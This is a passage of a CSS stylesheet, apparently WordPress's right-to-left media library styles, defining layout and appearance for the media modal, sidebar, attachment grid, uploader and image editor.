#135e96; } .media-frame a:focus { box-shadow: 0 0 0 2px #2271b1; color: #043959; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .media-frame a.button { color: #2c3338; } .media-frame a.button:hover { color: #1d2327; } .media-frame a.button-primary, .media-frame a.button-primary:hover { color: #fff; } .media-frame input, .media-frame textarea { padding: 6px 8px; } .media-frame select, .wp-admin .media-frame select { min-height: 30px; vertical-align: middle; } .media-frame input[type="text"], .media-frame input[type="password"], .media-frame input[type="color"], .media-frame input[type="date"], .media-frame input[type="datetime"], .media-frame input[type="datetime-local"], .media-frame input[type="email"], .media-frame input[type="month"], .media-frame input[type="number"], .media-frame input[type="search"], .media-frame input[type="tel"], .media-frame input[type="time"], .media-frame input[type="url"], .media-frame input[type="week"], .media-frame textarea, .media-frame select { box-shadow: 0 0 0 transparent; border-radius: 4px; border: 1px solid #8c8f94; background-color: #fff; color: #2c3338; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; line-height: 1.38461538; } .media-frame input[type="text"], .media-frame input[type="password"], .media-frame input[type="date"], .media-frame input[type="datetime"], .media-frame input[type="datetime-local"], .media-frame input[type="email"], .media-frame input[type="month"], .media-frame input[type="number"], .media-frame input[type="search"], .media-frame input[type="tel"], .media-frame input[type="time"], .media-frame input[type="url"], .media-frame input[type="week"] { padding: 0 8px; /* inherits font size 13px */ line-height: 2.15384615; /* 28px */ } /* Search field in the Media Library toolbar */ .media-frame.mode-grid .wp-filter input[type="search"] { font-size: 14px; line-height: 2; } .media-frame input[type="text"]:focus, .media-frame input[type="password"]:focus, .media-frame input[type="number"]:focus, .media-frame input[type="search"]:focus, .media-frame input[type="email"]:focus, .media-frame input[type="url"]:focus, .media-frame textarea:focus, .media-frame select:focus { border-color: #3582c4; box-shadow: 0 0 0 1px #3582c4; outline: 2px solid transparent; } .media-frame input:disabled, .media-frame textarea:disabled, .media-frame input[readonly], .media-frame textarea[readonly] { background-color: #f0f0f1; } .media-frame input[type="search"] { -webkit-appearance: textfield; } .media-frame ::-webkit-input-placeholder { color: #646970; } .media-frame ::-moz-placeholder { color: #646970; } /* * In some cases there's the need of higher specificity, * for example higher than `.media-embed .setting`. */ .media-frame .hidden, .media-frame .setting.hidden { display: none; } /*! * jQuery UI Draggable/Sortable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ .ui-draggable-handle, .ui-sortable-handle { touch-action: none; } /** * Modal */ .media-modal { position: fixed; top: 30px; right: 30px; left: 30px; bottom: 30px; z-index: 160000; } .wp-customizer .media-modal { z-index: 560000; } .media-modal-backdrop { position: fixed; top: 0; right: 0; left: 0; bottom: 0; min-height: 360px; background: #000; opacity: 0.7; z-index: 159900; } .wp-customizer .media-modal-backdrop { z-index: 559900; } .media-modal-close { position: absolute; top: 0; left: 0; width: 50px; height: 50px; margin: 0; padding: 0; border: 1px solid transparent; background: none; color: #646970; z-index: 1000; cursor: pointer; outline: none; transition: color .1s ease-in-out, background .1s ease-in-out; } .media-modal-close:hover, .media-modal-close:active { color: #135e96; } .media-modal-close:focus { color: #135e96; border-color: #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .media-modal-close span.media-modal-icon { background-image: none; } .media-modal-close .media-modal-icon:before { content: "\f158"; content: "\f158" / ''; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .media-modal-content { position: absolute; top: 0; right: 0; left: 0; bottom: 0; overflow: auto; min-height: 300px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.7); background: #fff; -webkit-font-smoothing: subpixel-antialiased; } .media-modal-content .media-frame select.attachment-filters { margin-top: 32px; margin-left: 2%; width: 42%; width: calc(48% - 12px); } /* higher specificity */ .wp-core-ui .media-modal-icon { background-image: url(../images/uploader-icons.png); background-repeat: no-repeat; } /** * Toolbar */ .media-toolbar { position: absolute; top: 0; right: 0; left: 0; z-index: 100; height: 60px; padding: 0 16px; border: 0 solid #dcdcde; overflow: hidden; } .media-frame-toolbar .media-toolbar { top: auto; bottom: -47px; height: auto; overflow: visible; border-top: 1px solid #dcdcde; } .media-toolbar-primary { float: left; height: 100%; position: relative; } .media-toolbar-secondary { float: right; height: 100%; } .media-toolbar-primary > .media-button, .media-toolbar-primary > .media-button-group { margin-right: 10px; float: right; margin-top: 15px; } .media-toolbar-secondary > .media-button, .media-toolbar-secondary > .media-button-group { margin-left: 10px; margin-top: 15px; } /** * Sidebar */ .media-sidebar { position: absolute; top: 0; left: 0; bottom: 0; width: 267px; padding: 0 16px; z-index: 75; background: #f6f7f7; border-right: 1px solid #dcdcde; overflow: auto; -webkit-overflow-scrolling: touch; } /* * Implementation of bottom padding in overflow content differs across browsers. * We need a different method. See https://github.com/w3c/csswg-drafts/issues/129 */ .media-sidebar::after { content: ""; display: flex; clear: both; height: 24px; } .hide-toolbar .media-sidebar { bottom: 0; } .media-sidebar h2, .image-details .media-embed h2 { position: relative; font-weight: 600; text-transform: uppercase; font-size: 12px; color: #646970; margin: 24px 0 8px; } .media-sidebar .setting, .attachment-details .setting { display: block; float: right; width: 100%; margin: 0 0 10px; } .attachment-details h2 { display: grid; grid-template-columns: auto 5em; } .media-sidebar .collection-settings .setting { margin: 1px 0; } .media-sidebar .setting.has-description, .attachment-details .setting.has-description { margin-bottom: 5px; } .media-sidebar .setting .link-to-custom { margin: 3px 2px 0; } .media-sidebar .setting span, /* Back-compat for pre-5.3 */ .attachment-details .setting span, /* Back-compat for pre-5.3 */ .media-sidebar .setting .name, .media-sidebar .setting .value, .attachment-details .setting .name { min-width: 30%; margin-left: 4%; font-size: 12px; text-align: left; word-wrap: break-word; } .media-sidebar .setting .name { max-width: 80px; } .media-sidebar .setting .value { text-align: right; } .media-sidebar .setting select { max-width: 65%; } .media-sidebar .setting input[type="checkbox"], .media-sidebar .field input[type="checkbox"], .media-sidebar .setting input[type="radio"], .media-sidebar .field input[type="radio"], .attachment-details .setting input[type="checkbox"], .attachment-details .field input[type="checkbox"], .attachment-details .setting input[type="radio"], .attachment-details .field input[type="radio"] { float: none; margin: 8px 3px 0; padding: 0; } .media-sidebar .setting span, /* Back-compat for pre-5.3 */ .attachment-details .setting span, /* Back-compat for pre-5.3 */ .media-sidebar .setting .name, .media-sidebar .setting .value, .media-sidebar .checkbox-label-inline, .attachment-details .setting .name, .attachment-details .setting .value, .compat-item label span { float: right; min-height: 22px; padding-top: 8px; line-height: 1.33333333; font-weight: 400; color: #646970; } .media-sidebar .checkbox-label-inline { font-size: 12px; } .media-sidebar .copy-to-clipboard-container, .attachment-details .copy-to-clipboard-container { flex-wrap: wrap; margin-top: 10px; margin-right: calc( 35% - 1px ); padding-top: 10px; } /* Needs high specificity. */ .attachment-details .attachment-info .copy-to-clipboard-container { float: none; } .media-sidebar .copy-to-clipboard-container .success, .attachment-details .copy-to-clipboard-container .success { padding: 0; min-height: 0; line-height: 2.18181818; text-align: right; color: #007017; } .compat-item label span { text-align: left; } .media-sidebar .setting input[type="text"], .media-sidebar .setting input[type="password"], .media-sidebar .setting input[type="email"], .media-sidebar .setting input[type="number"], .media-sidebar .setting input[type="search"], .media-sidebar .setting input[type="tel"], .media-sidebar .setting input[type="url"], .media-sidebar .setting textarea, .media-sidebar .setting .value, .attachment-details .setting input[type="text"], .attachment-details .setting input[type="password"], .attachment-details .setting input[type="email"], .attachment-details .setting input[type="number"], .attachment-details .setting input[type="search"], .attachment-details .setting input[type="tel"], .attachment-details .setting input[type="url"], .attachment-details .setting textarea, .attachment-details .setting .value, .attachment-details .setting + .description { box-sizing: border-box; margin: 1px; width: 65%; float: left; } .media-sidebar .setting .value, .attachment-details .setting .value, .attachment-details .setting + .description { margin: 0 1px; text-align: right; } .attachment-details .setting + .description { clear: both; font-size: 12px; font-style: normal; margin-bottom: 10px; } .media-sidebar .setting textarea, .attachment-details .setting textarea, .compat-item .field textarea { height: 62px; resize: vertical; } .media-sidebar .alt-text textarea, .attachment-details .alt-text textarea, .compat-item .alt-text textarea, .alt-text textarea { height: 50px; } .compat-item { float: right; width: 100%; overflow: hidden; } .compat-item table { width: 100%; table-layout: fixed; border-spacing: 0; border: 0; } .compat-item tr { padding: 2px 0; display: block; overflow: hidden; } .compat-item .label, .compat-item .field { display: block; margin: 0; padding: 0; } .compat-item .label { min-width: 30%; margin-left: 4%; float: right; text-align: left; } .compat-item .label span { display: block; width: 100%; } .compat-item .field { float: left; width: 65%; margin: 1px; } .compat-item .field input[type="text"], .compat-item .field input[type="password"], .compat-item .field input[type="email"], .compat-item .field input[type="number"], .compat-item .field input[type="search"], .compat-item .field input[type="tel"], .compat-item .field input[type="url"], .compat-item .field textarea { width: 100%; margin: 0; box-sizing: border-box; } .sidebar-for-errors .attachment-details, .sidebar-for-errors .compat-item, .sidebar-for-errors .media-sidebar .media-progress-bar, .sidebar-for-errors .upload-details { display: none !important; } /** * Menu */ .media-menu { position: absolute; top: 0; right: 0; left: 0; bottom: 0; margin: 0; padding: 50px 0 10px; background: #f6f7f7; border-left-width: 1px; border-left-style: solid; border-left-color: #c3c4c7; -webkit-user-select: none; user-select: none; } .media-menu .media-menu-item { display: block; box-sizing: border-box; width: 100%; position: relative; border: 0; margin: 0; padding: 8px 20px; font-size: 14px; line-height: 1.28571428; background: transparent; color: #2271b1; text-align: right; text-decoration: none; cursor: pointer; } .media-menu .media-menu-item:hover { background: rgba(0, 0, 0, 0.04); } .media-menu .media-menu-item:active { color: #2271b1; outline: none; } .media-menu .active, .media-menu .active:hover { color: #1d2327; font-weight: 600; } .media-menu .media-menu-item:focus { box-shadow: 0 0 0 2px #2271b1; color: #043959; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .media-menu .separator { height: 0; margin: 12px 20px; padding: 0; border-top: 1px solid #dcdcde; } /** * Menu */ .media-router { position: relative; padding: 0 6px; margin: 0; clear: both; } .media-router .media-menu-item { position: relative; float: right; border: 0; margin: 0; padding: 8px 10px 9px; height: 18px; line-height: 1.28571428; font-size: 14px; text-decoration: none; background: transparent; cursor: pointer; transition: none; } .media-router .media-menu-item:last-child { border-left: 0; } .media-router .media-menu-item:hover, .media-router .media-menu-item:active { color: #2271b1; } .media-router .active, .media-router .active:hover { color: #1d2327; } .media-router .media-menu-item:focus { box-shadow: 0 0 0 2px #2271b1; color: #043959; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; z-index: 1; } .media-router .active, .media-router .media-menu-item.active:last-child { margin: -1px -1px 0; background: #fff; border: 1px solid #dcdcde; border-bottom: none; } .media-router .active:after { display: none; } /** * Frame */ .media-frame { overflow: hidden; position: absolute; top: 0; right: 0; left: 0; bottom: 0; } .media-frame-menu { position: absolute; top: 0; right: 0; bottom: 0; width: 200px; z-index: 150; } .media-frame-title { position: absolute; top: 0; right: 200px; left: 0; height: 50px; z-index: 200; } .media-frame-router { position: absolute; top: 50px; right: 200px; left: 0; height: 36px; z-index: 200; } .media-frame-content { position: absolute; top: 84px; right: 200px; left: 0; bottom: 61px; height: auto; width: auto; margin: 0; overflow: auto; background: #fff; border-top: 1px solid #dcdcde; } .media-frame-toolbar { position: absolute; right: 200px; left: 0; z-index: 100; bottom: 60px; height: auto; } .media-frame.hide-menu .media-frame-title, .media-frame.hide-menu .media-frame-router, .media-frame.hide-menu .media-frame-toolbar, .media-frame.hide-menu .media-frame-content { right: 0; } .media-frame.hide-toolbar .media-frame-content { bottom: 0; } .media-frame.hide-router .media-frame-content { top: 50px; } .media-frame.hide-menu .media-frame-menu, .media-frame.hide-menu .media-frame-menu-heading, .media-frame.hide-router .media-frame-router, .media-frame.hide-toolbar .media-frame-toolbar { display: none; } .media-frame-title h1 { padding: 0 16px; font-size: 22px; line-height: 2.27272727; margin: 0; } .media-frame-menu-heading, .media-attachments-filter-heading { position: absolute; right: 20px; top: 22px; margin: 0; font-size: 13px; line-height: 1; /* Above the media-frame-menu. */ z-index: 151; } .media-attachments-filter-heading { top: 10px; right: 16px; } .mode-grid .media-attachments-filter-heading { top: 0; right: -9999px; } .mode-grid .media-frame-actions-heading { display: none; } .wp-core-ui .button.media-frame-menu-toggle { display: none; } .media-frame-title .suggested-dimensions { font-size: 14px; float: left; margin-left: 20px; } .media-frame-content .crop-content { height: 100%; } .options-general-php .crop-content.site-icon, .wp-customizer:not(.mobile) .media-frame-content .crop-content.site-icon { margin-left: 300px; } .media-frame-content .crop-content .crop-image { display: block; margin: auto; max-width: 100%; max-height: 100%; } .media-frame-content .crop-content .upload-errors { position: absolute; width: 300px; top: 50%; right: 50%; margin-right: -150px; margin-left: -150px; z-index: 600000; } /** * Iframes */ .media-frame .media-iframe { overflow: hidden; } .media-frame .media-iframe, .media-frame .media-iframe iframe { height: 100%; width: 100%; border: 0; } /** * Attachment Browser Filters */ .media-frame select.attachment-filters { margin-top: 11px; margin-left: 2%; max-width: 42%; max-width: calc(48% - 12px); } .media-frame select.attachment-filters:last-of-type { margin-left: 0; } /** * Search */ .media-frame .search { margin: 32px 0 0; padding: 4px; font-size: 13px; color: #3c434a; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; -webkit-appearance: none; } .media-toolbar-primary .search { max-width: 100%; } .media-modal .media-frame .media-search-input-label { position: absolute; right: 0; top: 10px; margin: 0; line-height: 1; } /** * Attachments */ .wp-core-ui .attachments { margin: 0; -webkit-overflow-scrolling: touch; } /** * Attachment */ .wp-core-ui .attachment { position: relative; float: right; padding: 8px; margin: 0; color: #3c434a; cursor: pointer; list-style: none; text-align: center; -webkit-user-select: none; user-select: none; width: 25%; box-sizing: border-box; } .wp-core-ui .attachment:focus, .wp-core-ui .selected.attachment:focus, .wp-core-ui .attachment.details:focus { box-shadow: inset 0 0 2px 3px #fff, inset 0 0 0 7px #4f94d4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -6px; } .wp-core-ui .selected.attachment { box-shadow: inset 0 0 0 5px #fff, inset 0 0 0 7px #c3c4c7; } .wp-core-ui .attachment.details { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #2271b1; } .wp-core-ui .attachment-preview { position: relative; box-shadow: inset 0 0 15px rgba(0, 0, 0, 0.1), inset 0 0 0 1px rgba(0, 0, 0, 0.05); background: #f0f0f1; cursor: pointer; } .wp-core-ui .attachment-preview:before { content: ""; display: block; padding-top: 100%; } .wp-core-ui .attachment .icon { margin: 0 auto; overflow: hidden; } .wp-core-ui .attachment .thumbnail { overflow: hidden; position: absolute; top: 0; left: 0; bottom: 0; right: 0; opacity: 1; transition: opacity .1s; } .wp-core-ui .attachment .portrait img { max-width: 100%; } .wp-core-ui .attachment .landscape img { max-height: 100%; } .wp-core-ui .attachment .thumbnail:after { content: ""; display: block; position: absolute; top: 0; right: 0; left: 0; bottom: 0; box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.1); overflow: hidden; } .wp-core-ui .attachment .thumbnail img { top: 0; right: 0; } .wp-core-ui .attachment .thumbnail .centered { position: absolute; top: 0; right: 0; width: 100%; height: 100%; transform: translate( -50%, 50% ); } .wp-core-ui .attachment .thumbnail .centered img { transform: translate( 50%, -50% ); } .wp-core-ui .attachments-browser .attachment .thumbnail .centered img.icon { transform: translate( 50%, -70% ); } .wp-core-ui .attachment .filename { position: absolute; right: 0; left: 0; bottom: 0; overflow: hidden; max-height: 100%; word-wrap: break-word; text-align: center; font-weight: 600; background: rgba(255, 255, 255, 0.8); box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.15); } .wp-core-ui .attachment .filename div { padding: 5px 10px; } .wp-core-ui .attachment .thumbnail img { position: absolute; } .wp-core-ui .attachment-close { display: block; position: absolute; top: 5px; left: 5px; height: 22px; width: 22px; padding: 0; background-color: #fff; border-radius: 3px; box-shadow: 0 0 0 1px rgba(0, 0, 0, 0.3); transition: none; } .wp-core-ui .attachment-close .media-modal-icon { display: inline-block; background-position: -96px 4px; height: 22px; width: 22px; } .wp-core-ui .attachment-close:hover .media-modal-icon, .wp-core-ui .attachment-close:focus .media-modal-icon { background-position: -36px 4px; } .wp-core-ui .attachment .check { display: none; height: 24px; width: 24px; padding: 0; border: 0; position: absolute; z-index: 10; top: 0; left: 0; outline: none; background: #f0f0f1; cursor: pointer; box-shadow: 0 0 0 1px #fff, 0 0 0 2px rgba(0, 0, 0, 0.15); } .wp-core-ui .attachment .check .media-modal-icon { display: block; background-position: -1px 0; height: 15px; width: 15px; margin: 5px; } .wp-core-ui .attachment .check:hover .media-modal-icon { background-position: -40px 0; } .wp-core-ui .attachment.selected .check { display: block; } .wp-core-ui .attachment.details .check, .wp-core-ui .attachment.selected .check:focus, .wp-core-ui .media-frame.mode-grid .attachment.selected .check { background-color: #2271b1; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #2271b1; } .wp-core-ui .attachment.selected .check:focus { /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-core-ui .attachment.details .check .media-modal-icon, .wp-core-ui .media-frame.mode-grid .attachment.selected .check .media-modal-icon { background-position: -21px 0; } .wp-core-ui .attachment.details .check:hover .media-modal-icon, .wp-core-ui .attachment.selected .check:focus .media-modal-icon, .wp-core-ui .media-frame.mode-grid .attachment.selected .check:hover .media-modal-icon { background-position: -60px 0; } .wp-core-ui .media-frame .attachment .describe { position: relative; display: block; width: 100%; margin: 0; padding: 0 8px; font-size: 12px; border-radius: 0; } /** * Attachments Browser */ .media-frame .attachments-browser { position: relative; width: 100%; height: 100%; overflow: hidden; } .attachments-browser .media-toolbar { left: 300px; height: 72px; background: #fff; } .attachments-browser.hide-sidebar .media-toolbar { left: 0; } .attachments-browser .media-toolbar-primary > .media-button, .attachments-browser .media-toolbar-primary > .media-button-group, .attachments-browser .media-toolbar-secondary > .media-button, .attachments-browser .media-toolbar-secondary > .media-button-group { margin: 10px 0; } .attachments-browser .attachments { padding: 2px 8px 8px; } .attachments-browser:not(.has-load-more) .attachments, .attachments-browser.has-load-more .attachments-wrapper, .attachments-browser .uploader-inline { position: absolute; top: 72px; right: 0; left: 300px; bottom: 0; overflow: auto; outline: none; } .attachments-browser .uploader-inline.hidden { display: none; } .attachments-browser .media-toolbar-primary { max-width: 33%; } .mode-grid .attachments-browser .media-toolbar-primary { display: flex; align-items: center; column-gap: .5rem; margin: 11px 0; } .mode-grid .attachments-browser .media-toolbar-mode-select .media-toolbar-primary { display: none; } .attachments-browser .media-toolbar-secondary { max-width: 66%; } .uploader-inline .close { background-color: transparent; border: 0; cursor: pointer; height: 48px; outline: none; padding: 0; position: absolute; left: 2px; text-align: center; top: 2px; width: 48px; z-index: 1; } .uploader-inline .close:before { font: normal 30px/1 dashicons !important; color: #50575e; display: inline-block; content: "\f335"; content: "\f335" / ''; font-weight: 300; margin-top: 1px; } .uploader-inline .close:focus { outline: 1px solid #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); } .attachments-browser.hide-sidebar .attachments, .attachments-browser.hide-sidebar .uploader-inline { left: 0; margin-left: 0; } .attachments-browser .instructions { display: inline-block; margin-top: 16px; line-height: 1.38461538; font-size: 13px; color: #646970; } .attachments-browser .no-media { padding: 2em 2em 0 0; } .more-loaded .attachment:not(.found-media) { background: #dcdcde; } .load-more-wrapper { clear: both; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; padding: 1em 0; } .load-more-wrapper .load-more-count { min-width: 100%; margin: 0 0 1em; text-align: center; } .load-more-wrapper .load-more { margin: 0; } /* Needs high specificity. */ .media-frame .load-more-wrapper .load-more + .spinner { float: none; margin: 0 10px 0 -30px; } /* Reset spinner margin when the button is hidden to avoid horizontal scrollbar. */ .media-frame .load-more-wrapper .load-more.hidden + .spinner { margin: 0; } /* Force a new row within the flex container. */ .load-more-wrapper::after { content: ""; min-width: 100%; order: 1; } .load-more-wrapper .load-more-jump { margin: 0 12px 0 0; } .attachment.new-media { outline: 2px dotted #c3c4c7; } /** * Progress Bar */ .media-progress-bar { position: relative; height: 10px; width: 70%; margin: 10px auto; border-radius: 10px; background: #dcdcde; background: rgba(0, 0, 0, 0.1); } .media-progress-bar div { height: 10px; min-width: 20px; width: 0; background: #2271b1; border-radius: 10px; transition: width 300ms; } .media-uploader-status .media-progress-bar { display: none; width: 100%; } .uploading.media-uploader-status .media-progress-bar { display: block; } .attachment-preview .media-progress-bar { position: absolute; top: 50%; right: 15%; width: 70%; margin: -5px 0 0; } .media-uploader-status { position: relative; margin: 0 auto; padding-bottom: 10px; max-width: 400px; } .uploader-inline .media-uploader-status h2 { display: none; } .media-uploader-status .upload-details { display: none; font-size: 12px; color: #646970; } .uploading.media-uploader-status .upload-details { display: block; } .media-uploader-status .upload-detail-separator { padding: 0 4px; } .media-uploader-status .upload-count { color: #3c434a; } .media-uploader-status .upload-dismiss-errors, .media-uploader-status .upload-errors { display: none; } .errors.media-uploader-status .upload-dismiss-errors, .errors.media-uploader-status .upload-errors { display: block; } .media-uploader-status .upload-dismiss-errors { transition: none; text-decoration: none; } .upload-errors .upload-error { padding: 12px; margin-bottom: 12px; background: #fff; border-right: 4px solid #d63638; box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1); } .uploader-inline .upload-errors .upload-error { padding: 12px 30px; background-color: #fcf0f1; box-shadow: none; } .upload-errors .upload-error-filename { font-weight: 600; } .upload-errors .upload-error-message { display: block; padding-top: 8px; word-wrap: break-word; } /** * Window and Editor uploaders used to display "drop zones" */ .uploader-window, .wp-editor-wrap .uploader-editor { top: 0; right: 0; left: 0; bottom: 0; text-align: center; display: none; } .uploader-window { position: fixed; z-index: 250000; opacity: 0; /* Only the inline uploader is animated with JS, the editor one isn't */ transition: opacity 250ms; } .wp-editor-wrap .uploader-editor { position: absolute; z-index: 99998; /* under the toolbar */ background: rgba(140, 143, 148, 0.9); } .uploader-window, .wp-editor-wrap .uploader-editor.droppable { background: rgba(10, 75, 120, 0.9); } .uploader-window-content, .wp-editor-wrap .uploader-editor-content { position: absolute; top: 10px; right: 10px; left: 10px; bottom: 10px; border: 1px dashed #fff; } /* uploader drop-zone title */ .uploader-window h1, /* Back-compat for pre-5.3 */ .uploader-window .uploader-editor-title, .wp-editor-wrap .uploader-editor .uploader-editor-title { position: absolute; top: 50%; right: 0; left: 0; transform: translateY(-50%); font-size: 3em; line-height: 1.3; font-weight: 600; color: #fff; margin: 0; padding: 0 10px; } .wp-editor-wrap .uploader-editor .uploader-editor-title { display: none; } .wp-editor-wrap .uploader-editor.droppable .uploader-editor-title { display: block; } .uploader-window .media-progress-bar { margin-top: 20px; max-width: 300px; background: transparent; border-color: #fff; display: none; } .uploader-window .media-progress-bar div { background: #fff; } .uploading .uploader-window .media-progress-bar { display: block; } .media-frame .uploader-inline { margin-bottom: 20px; padding: 0; text-align: center; } .uploader-inline-content { position: absolute; top: 30%; right: 0; left: 0; } .uploader-inline-content .upload-ui { margin: 2em 0; } .uploader-inline-content .post-upload-ui { margin-bottom: 2em; } .uploader-inline .has-upload-message .upload-ui { margin: 0 0 4em; } .uploader-inline h2 { font-size: 20px; line-height: 1.4; font-weight: 400; margin: 0; } .uploader-inline .has-upload-message .upload-instructions { font-size: 14px; color: #3c434a; font-weight: 400; } .uploader-inline .drop-instructions { display: none; } .supports-drag-drop .uploader-inline .drop-instructions { display: block; } .uploader-inline p { margin: 0.5em 0; } .uploader-inline .media-progress-bar { display: none; } .uploading.uploader-inline .media-progress-bar { display: block; } .uploader-inline .browser { display: inline-block !important; } /** * Selection */ .media-selection { position: absolute; top: 0; right: 0; left: 350px; height: 60px; padding: 0 16px 0 0; overflow: hidden; white-space: nowrap; } .media-selection .selection-info { display: inline-block; font-size: 12px; height: 60px; margin-left: 10px; vertical-align: top; } .media-selection.empty, .media-selection.editing { display: none; } .media-selection.one .edit-selection { display: none; } .media-selection .count { display: block; padding-top: 12px; font-size: 14px; line-height: 1.42857142; font-weight: 600; } .media-selection .button-link { float: right; padding: 1px 8px; margin: 1px -8px 1px 8px; line-height: 1.4; border-left: 1px solid #dcdcde; color: #2271b1; text-decoration: none; } .media-selection .button-link:hover, .media-selection .button-link:focus { color: #135e96; } .media-selection .button-link:last-child { border-left: 0; margin-left: 0; } .selection-info .clear-selection { color: #d63638; } .selection-info .clear-selection:hover, .selection-info .clear-selection:focus { color: #d63638; } .media-selection .selection-view { display: inline-block; vertical-align: top; } .media-selection .attachments { display: inline-block; height: 48px; margin: 6px; padding: 0; overflow: hidden; vertical-align: top; } .media-selection .attachment { width: 40px; padding: 0; margin: 4px; } .media-selection .attachment .thumbnail { top: 0; left: 0; bottom: 0; right: 0; } .media-selection .attachment .icon { width: 50%; } .media-selection .attachment-preview { box-shadow: none; background: none; } .wp-core-ui .media-selection .attachment:focus, .wp-core-ui .media-selection .selected.attachment:focus, .wp-core-ui .media-selection .attachment.details:focus { box-shadow: 0 0 0 1px #fff, 0 0 2px 3px #4f94d4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-core-ui .media-selection .selected.attachment { box-shadow: none; } .wp-core-ui .media-selection .attachment.details { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #2271b1; } .media-selection:after { content: ""; display: block; position: absolute; top: 0; left: 0; bottom: 0; width: 25px; background-image: linear-gradient(to right,#fff,rgba(255, 255, 255, 0)); } .media-selection .attachment .filename { display: none; } /** * Spinner */ .media-frame .spinner { background: url(../images/spinner.gif) no-repeat; background-size: 20px 20px; float: left; display: inline-block; visibility: hidden; opacity: 0.7; filter: alpha(opacity=70); width: 20px; height: 20px; margin: 0; vertical-align: middle; } .media-frame .media-sidebar .settings-save-status .spinner { position: absolute; left: 0; top: 0; } .media-frame.mode-grid .spinner { margin: 0; float: none; vertical-align: middle; } .media-modal .media-toolbar .spinner { float: none; vertical-align: bottom; margin: 0 5px 5px 0; } .media-frame .instructions + .spinner.is-active { vertical-align: middle; } .media-frame .spinner.is-active { visibility: visible; } /** * Attachment Details */ .attachment-details { position: relative; overflow: auto; } .attachment-details .settings-save-status { text-align: left; text-transform: none; font-weight: 400; } .attachment-details .settings-save-status .spinner { float: none; margin-right: 5px; } .attachment-details .settings-save-status .saved { display: none; } .attachment-details.save-waiting .settings-save-status .spinner { visibility: visible; } .attachment-details.save-complete .settings-save-status .saved { display: inline-block; } .attachment-info { overflow: hidden; min-height: 60px; margin-bottom: 16px; line-height: 1.5; color: #646970; border-bottom: 1px solid #dcdcde; padding-bottom: 11px; } .attachment-info .wp-media-wrapper { margin-bottom: 8px; } .attachment-info .wp-media-wrapper.wp-audio { margin-top: 13px; } .attachment-info .filename { font-weight: 600; color: #3c434a; word-wrap: break-word; } .attachment-info .thumbnail { position: relative; float: right; max-width: 120px; max-height: 120px; margin-top: 5px; margin-left: 10px; margin-bottom: 5px; } .uploading .attachment-info .thumbnail { width: 120px; height: 80px; box-shadow: inset 0 0 15px rgba(0, 0, 0, 0.1); } .uploading .attachment-info .media-progress-bar { margin-top: 35px; } .attachment-info .thumbnail-image:after { content: ""; display: block; position: absolute; top: 0; right: 0; left: 0; bottom: 0; box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.15); overflow: hidden; } .attachment-info .thumbnail img { display: block; max-width: 120px; max-height: 120px; margin: 0 auto; } .attachment-info .details { float: right; font-size: 12px; max-width: 100%; } .attachment-info .edit-attachment, .attachment-info .delete-attachment, .attachment-info .trash-attachment, .attachment-info .untrash-attachment { display: block; text-decoration: none; white-space: nowrap; } .attachment-details.needs-refresh .attachment-info .edit-attachment { display: none; } .attachment-info .edit-attachment { display: block; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment { display: inline; padding: 0; color: #d63638; } .media-modal .delete-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:hover, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:hover, .media-modal .untrash-attachment:focus { color: #d63638; } /** * Attachment Display Settings */ .attachment-display-settings { width: 100%; float: right; overflow: hidden; } .collection-settings { overflow: hidden; } .collection-settings .setting input[type="checkbox"] { float: right; margin-left: 8px; } .collection-settings .setting span, /* Back-compat for pre-5.3 */ .collection-settings .setting .name { min-width: inherit; } /** * Image Editor */ .media-modal .imgedit-wrap { position: static; } .media-modal .imgedit-wrap .imgedit-panel-content { padding: 16px 16px 0; overflow: visible; } /* * Implementation of bottom padding in overflow content differs across browsers. * We need a different method. See https://github.com/w3c/csswg-drafts/issues/129 */ .media-modal .imgedit-wrap .imgedit-save-target { margin: 8px 0 24px; } .media-modal .imgedit-group { background: none; border: none; box-shadow: none; margin: 0; padding: 0; position: relative; /* RTL fix, #WP29352 */ } .media-modal .imgedit-group.imgedit-panel-active { margin-bottom: 16px; padding-bottom: 16px; } .media-modal .imgedit-group-top { margin: 0; } .media-modal .imgedit-group-top h2, .media-modal .imgedit-group-top h2 .button-link { display: inline-block; text-transform: uppercase; font-size: 12px; color: #646970; margin: 0; margin-top: 3px; } .media-modal .imgedit-group-top h2 a, .media-modal .imgedit-group-top h2 .button-link { text-decoration: none; color: #646970; } /* higher specificity than media.css */ .wp-core-ui.media-modal .image-editor .imgedit-help-toggle, .wp-core-ui.media-modal .image-editor .imgedit-help-toggle:hover, .wp-core-ui.media-modal .image-editor .imgedit-help-toggle:active { border: 1px solid transparent; margin: 0; padding: 0; background: transparent; color: #2271b1; font-size: 20px; line-height: 1; cursor: pointer; box-sizing: content-box; box-shadow: none; } .wp-core-ui.media-modal .image-editor .imgedit-help-toggle:focus { color: #2271b1; border-color: #2271b1; box-shadow: 0 0 0 1px 